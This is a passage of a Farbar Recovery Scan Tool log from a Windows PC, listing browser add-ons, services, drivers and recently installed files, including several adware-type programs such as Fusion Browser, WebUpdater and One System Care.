Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)

Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll [2015-02-11] (Mindspark)

Toolbar: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File

Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)

Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)

Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)

Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)

Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)

Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\MSC\McSnIePl64.dll [2015-12-03] (McAfee, Inc.)

Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2015-12-03] (McAfee, Inc.)

FireFox:

========

FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2016-01-01] ()

FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2015-12-03] ()

FF Plugin: @microsoft.com/GENUINE -> disabled [No File]

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41105.0\npctrl.dll [2015-11-04] ( Microsoft Corporation)

FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2016-01-01] ()

FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)

FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2016-01-01] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2016-01-01] (Oracle Corporation)

FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2015-12-03] ()

FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]

FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-03] (Microsoft Corporation)

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41105.0\npctrl.dll [2015-11-04] ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2014-11-02] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)

FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2011-09-28] ()

FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)

FF Plugin HKU\S-1-5-21-1024156207-2972793060-2867319265-1000: gradecam.com/GCPlugin -> C:\Users\Charlie\AppData\Roaming\GradeCam Corporation\GCPlugin\npGCPlugin_2.0.2.10.dll [2015-10-08] (GradeCam Corporation)

FF Plugin HKU\S-1-5-21-1024156207-2972793060-2867319265-1000: gradecam.com/GCPlugin2 -> C:\Users\Charlie\AppData\Roaming\GradeCam\GCPlugin2\2.0.2.10\npGCPlugin2_2.0.2.10.dll [2015-10-08] (GradeCam)

FF Plugin HKU\S-1-5-21-1024156207-2972793060-2867319265-1000: gradecam.com/GCPluginx64 -> C:\Users\Charlie\AppData\Roaming\GradeCam Corporation\GCPlugin64\npGCPlugin64_2.0.2.10.dll [2015-10-08] (GradeCam Corporation)

FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi

FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]

FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn

FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2015-11-15] [not signed]

FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi

FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]

FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK

FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2015-11-29] [not signed]

Chrome:

=======

CHR HomePage: Default -> hxxp://www.google.com

CHR StartupUrls: Default -> "hxxp://www.google.com"

CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?fr=mcafee&type=C211US0D20151117&p={searchTerms}

CHR DefaultSearchKeyword: Default -> mcafee

CHR Profile: C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Slides) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-04]

CHR Extension: (Google Docs) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-04]

CHR Extension: (Google Drive) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-29]

CHR Extension: (YouTube) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25]

CHR Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-01-05]

CHR Extension: (Google Search) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-29]

CHR Extension: (Google Sheets) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-04]

CHR Extension: (SiteAdvisor) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-26]

CHR Extension: (Google Docs Offline) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-17]

CHR Extension: (GradeCam Helper) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lghkdmpjndggpffgahogcopicpednbgm [2015-11-26]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-23]

CHR Extension: (Gmail) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-03]

CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-02]

CHR HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lghkdmpjndggpffgahogcopicpednbgm] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-02]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [318592 2013-11-29] (Windows ® Win 7 DDK provider) [File not signed]

R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2802360 2015-11-24] (Microsoft Corporation)

S2 CLKMSVC10_99E320F5; C:\Program Files (x86)\CyberLink\PowerDVD12\Common\NavFilter\kmsvc.exe [243464 2014-05-02] (CyberLink)

R2 FromDocToPDF_65Service; C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65barsvc.exe [90696 2015-02-11] (Mindspark)

S2 Fusion Browser Startup Service; C:\Program Files\FusionBrowser\wdsvc2.exe [298496 2015-11-24] () [File not signed]

R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [517464 2015-01-28] (Garmin Ltd or its subsidiaries)

R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)

R2 HPSLPSVC; C:\Users\Charlie\AppData\Local\Temp\7zS65A9\hpslpsvc64.dll [1039360 2013-07-19] (Hewlett-Packard Co.) [File not signed]

R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)

R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation)

R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [315352 2014-11-27] (Intel Corporation)

R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]

S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)

R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-12-10] (Intel Corporation)

R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)

R2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [2751760 2016-01-10] (Lavasoft Limited)

R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)

R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2015-12-03] (McAfee, Inc.)

R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe [1694152 2015-12-02] (McAfee, Inc.)

R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)

R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)

S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [679120 2015-10-20] (McAfee, Inc.)

R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)

R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)

R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [233680 2015-09-21] (McAfee, Inc.)

R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [378848 2015-10-21] (McAfee, Inc.)

R3 mfevtp; C:\Windows\system32\mfevtps.exe [256840 2015-09-21] (McAfee, Inc.)

R2 MFLService2; C:\Program Files (x86)\Get-a-Clip\MFLService2.exe [1983640 2016-01-10] ()

R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)

R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed]

R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)

R2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [17168 2016-01-10] ()

R2 SMARTHelperService; C:\Program Files (x86)\SMART Technologies\Education Software\SMARTHelperService.exe [538416 2014-02-12] (SMART Technologies)

R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-06-16] (Synaptics Incorporated)

R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [32768 2013-08-01] (Validity Sensors, Inc.) [File not signed]

S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2014-07-07] (Microsoft Corporation)

S2 wusvc; C:\Program Files\WebUpdater\webupdaterservice.exe [61952 2015-12-30] (Web Updater Media) [File not signed]

R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2013-11-29] (Atheros) [File not signed]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 BTATH_LWFLT; C:\Windows\System32\DRIVERS\btath_lwflt.sys [77464 2013-11-29] (Qualcomm Atheros)

R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [80760 2015-09-23] (McAfee, Inc.)

R1 CLVirtualDrive; C:\Windows\System32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)

S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)

S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)

R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-11-08] (Intel Corporation)

S3 lehidmini; C:\Windows\system32\drivers\leath_hid.sys [39704 2013-11-29] (Atheros)

R2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [76064 2015-09-29] (McAfee, Inc.)

R3 MEIx64; C:\Windows\system32\drivers\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)

R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [415976 2015-09-23] (McAfee, Inc.)

R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [351120 2015-09-23] (McAfee, Inc.)

R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [497888 2015-09-23] (McAfee, Inc.)

R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [841944 2015-09-23] (McAfee, Inc.)

R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [537192 2015-10-06] (McAfee, Inc.)

S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2015-10-06] (McAfee, Inc.)

R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)

R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [244544 2015-09-23] (McAfee, Inc.)

U5 RTSPER; C:\Windows\System32\Drivers\RTSPER.sys [476888 2014-03-21] (Realsil Semiconductor Corporation)

R3 SMARTMouseFilterx64; C:\Windows\System32\DRIVERS\SMARTMouseFilterx64.sys [10240 2014-02-12] (SMART Technologies)

R3 SMARTVHidMiniVistaAmd64; C:\Windows\System32\DRIVERS\SMARTVHidMiniVistaAmd64.sys [9216 2014-02-12] (SMART Technologies)

S3 SMARTVTabletPCx64; C:\Windows\System32\DRIVERS\SMARTVTabletPCx64.sys [22184 2014-02-12] (SMART Technologies ULC)

S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [30448 2014-06-16] (Synaptics Incorporated)

R3 SmbDrvI; C:\Windows\system32\drivers\Smb_driver_Intel.sys [31472 2014-06-16] (Synaptics Incorporated)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 12:42 - 2016-01-10 12:42 - 00001150 _____ C:\Users\Charlie\Desktop\FRST64 - Shortcut.lnk

2016-01-10 12:40 - 2016-01-10 12:40 - 02370560 _____ (Farbar) C:\Users\Charlie\Downloads\FRST64 (2).exe

2016-01-10 12:19 - 2016-01-10 12:21 - 00067326 _____ C:\Users\Charlie\Downloads\Addition.txt

2016-01-10 12:18 - 2016-01-10 12:43 - 00042563 _____ C:\Users\Charlie\Downloads\FRST.txt

2016-01-10 12:18 - 2016-01-10 12:43 - 00000000 ____D C:\FRST

2016-01-10 12:18 - 2016-01-10 12:18 - 02370560 _____ (Farbar) C:\Users\Charlie\Downloads\FRST64 (1).exe

2016-01-10 12:17 - 2016-01-10 12:17 - 02370560 _____ (Farbar) C:\Users\Charlie\Downloads\FRST64.exe

2016-01-10 11:57 - 2016-01-10 11:57 - 00003824 _____ C:\Windows\System32\Tasks\WebUpdater Task

2016-01-10 11:57 - 2016-01-10 11:57 - 00000095 _____ C:\wulog.txt

2016-01-10 11:57 - 2016-01-10 11:57 - 00000000 ____D C:\Users\Charlie\AppData\Local\WebUpdater

2016-01-10 11:57 - 2016-01-10 11:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WebUpdater

2016-01-10 11:56 - 2016-01-10 12:06 - 00000000 ____D C:\Users\Charlie\AppData\Local\chrome

2016-01-10 11:56 - 2016-01-10 11:56 - 00004034 _____ C:\Windows\System32\Tasks\Fusion Browser Update Task

2016-01-10 11:56 - 2016-01-10 11:56 - 00003300 _____ C:\Windows\System32\Tasks\WebUpdater LaunchTask

2016-01-10 11:56 - 2016-01-10 11:56 - 00003280 _____ C:\Windows\System32\Tasks\Fusion Browser Launch Task

2016-01-10 11:56 - 2016-01-10 11:56 - 00000977 _____ C:\Users\Public\Desktop\Fusion Browser.lnk

2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Users\Charlie\AppData\Local\FusionBrowser

2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Program Files\WebUpdater

2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Program Files\FusionBrowser

2016-01-10 11:55 - 2016-01-10 11:55 - 00111600 _____ C:\Windows\SysWOW64\mfllib.dll

2016-01-10 11:55 - 2016-01-10 11:55 - 00023236 _____ C:\Windows\System32\Tasks\{780E0B47-7A78-0A0E-0911-0B79050F110A}

2016-01-10 11:55 - 2016-01-10 11:55 - 00003572 _____ C:\Windows\System32\Tasks\One System Care Task

2016-01-10 11:55 - 2016-01-10 11:55 - 00003264 _____ C:\Windows\System32\Tasks\One System Care Monitor

2016-01-10 11:55 - 2016-01-10 11:55 - 00002860 _____ C:\Windows\System32\Tasks\One System CarePeriod

2016-01-10 11:55 - 2016-01-10 11:55 - 00001071 _____ C:\Users\Public\Desktop\Launch One System Care.lnk

2016-01-10 11:55 - 2016-01-10 11:55 - 00000280 _____ C:\Windows\Tasks\One System CarePeriod.job

2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\One System Care

2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care

2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\edc8d5e4-5c45-1

2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\edc8d5e4-02f5-0

2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Program Files (x86)\OneSystemCare

2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Program Files (x86)\Get-a-Clip

2016-01-10 11:54 - 2016-01-10 11:54 - 00425744 _____ (Lavasoft Limited) C:\Windows\system32\LavasoftTcpService64.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00345360 _____ (Lavasoft Limited) C:\Windows\SysWOW64\LavasoftTcpService.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00002880 _____ C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini

2016-01-10 11:54 - 2016-01-10 11:54 - 00002880 _____ C:\Windows\system32\LavasoftTcpServiceOff.ini

2016-01-10 11:54 - 2016-01-10 11:54 - 00000397 _____ C:\Prefs.js

2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Lavasoft

2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\Users\Charlie\AppData\Local\Lavasoft

2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\searchplugins

2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft

2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\Program Files (x86)\Lavasoft

2016-01-10 11:53 - 2016-01-10 11:53 - 00000000 ____D C:\ProgramData\Lavasoft

2016-01-10 09:58 - 2016-01-10 09:58 - 00003846 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse

2016-01-09 16:14 - 2016-01-09 16:14 - 00004020 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse

2016-01-03 17:56 - 2016-01-03 19:14 - 00000000 ____D C:\ProgramData\MSNDynFiles

2016-01-01 15:09 - 2016-01-01 15:09 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Sun

2016-01-01 15:09 - 2016-01-01 15:09 - 00000000 ____D C:\Users\Charlie\.oracle_jre_usage

2016-01-01 15:08 - 2016-01-01 15:08 - 00000000 ____D C:\Users\Charlie\AppData\LocalLow\Oracle

2016-01-01 15:06 - 2016-01-01 15:06 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk

2016-01-01 15:06 - 2016-01-01 15:06 - 00002019 _____ C:\Users\Public\Desktop\Adobe Reader XI.lnk

2015-12-11 12:38 - 2015-12-11 12:38 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 12:34 - 2009-07-13 23:45 - 00034432 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2016-01-10 12:34 - 2009-07-13 23:45 - 00034432 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2016-01-10 12:31 - 2015-06-30 15:15 - 00000926 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000UA.job

2016-01-10 12:20 - 2014-11-03 13:41 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2016-01-10 12:19 - 2009-07-13 22:20 - 00000000 ____D C:\Windows

2016-01-10 11:48 - 2014-07-07 21:47 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job

2016-01-10 09:58 - 2014-10-18 16:32 - 00003958 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{8AA93FD4-5F8F-41DB-A04A-5E7F090BEAB9}

2016-01-09 22:57 - 2014-10-18 19:53 - 00000000 ____D C:\Users\Charlie\AppData\Local\CrashDumps

2016-01-09 21:31 - 2015-06-30 15:15 - 00000874 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000Core.job

2016-01-09 16:20 - 2014-11-03 13:41 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2016-01-09 07:05 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF

2016-01-07 22:52 - 2014-11-03 13:41 - 00000000 ____D C:\Users\Charlie\AppData\Local\Deployment

2016-01-07 22:47 - 2009-07-14 00:13 - 00784286 _____ C:\Windows\system32\PerfStringBackup.INI

2016-01-07 22:47 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf

2016-01-03 20:27 - 2014-11-09 13:34 - 00000000 ____D C:\Users\Charlie\Documents\Personal

2016-01-03 19:14 - 2014-10-28 15:26 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\MSN6

2016-01-03 18:48 - 2014-07-07 21:47 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe

2016-01-03 18:48 - 2014-07-07 21:47 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

2016-01-03 18:48 - 2014-07-07 21:47 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater

2016-01-03 18:01 - 2015-11-17 17:36 - 00000000 __RSD C:\Users\Charlie\Documents\McAfee Vaults

2016-01-03 18:01 - 2014-10-18 16:30 - 00000000 ____D C:\Users\Charlie\Documents\Youcam

2016-01-03 18:00 - 2015-03-04 19:22 - 00000000 ___RD C:\Users\Charlie\Dropbox

2016-01-03 18:00 - 2015-03-04 19:18 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Dropbox

2016-01-03 17:57 - 2015-11-11 13:13 - 00000340 _____ C:\Windows\Tasks\HPCeeScheduleForCharlie.job

2016-01-03 17:57 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT

2016-01-03 05:38 - 2015-11-11 13:13 - 00003198 _____ C:\Windows\System32\Tasks\HPCeeScheduleForCharlie

2016-01-01 15:09 - 2015-02-20 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java

2016-01-01 15:09 - 2014-10-18 16:27 - 00000000 ____D C:\Users\Charlie

2016-01-01 15:08 - 2015-02-20 21:19 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll

2016-01-01 15:08 - 2015-02-20 21:18 - 00000000 ____D C:\Program Files (x86)\Java

2016-01-01 15:04 - 2014-07-07 21:50 - 00000000 ____D C:\ProgramData\Adobe

2016-01-01 15:04 - 2014-07-07 21:50 - 00000000 ____D C:\Program Files (x86)\Adobe

2015-12-21 09:56 - 2014-10-18 16:33 - 00000000 ____D C:\Users\Charlie\Documents\Bluetooth Folder

2015-12-20 12:06 - 2014-11-16 23:26 - 00003946 _____ C:\Users\Charlie\AppData\Roaming\evpro32.prf

2015-12-18 07:54 - 2014-07-07 21:48 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft

2015-12-18 07:48 - 2014-10-18 19:53 - 00000000 ____D C:\Program Files\Microsoft Office 15

2015-12-18 07:37 - 2015-04-07 13:24 - 00000000 ___SD C:\Windows\SysWOW64\GWX

2015-12-18 07:37 - 2015-04-07 13:24 - 00000000 ___SD C:\Windows\system32\GWX

2015-12-16 18:27 - 2015-11-17 17:35 - 00003080 _____ C:\Windows\System32\Tasks\McAfeeLogon

2015-12-16 18:27 - 2014-08-05 20:26 - 00000000 ____D C:\Program Files (x86)\McAfee

2015-12-16 18:24 - 2014-11-03 13:42 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk

2015-12-15 21:54 - 2014-10-27 21:48 - 00000000 ____D C:\Users\Charlie\Documents\BCHS

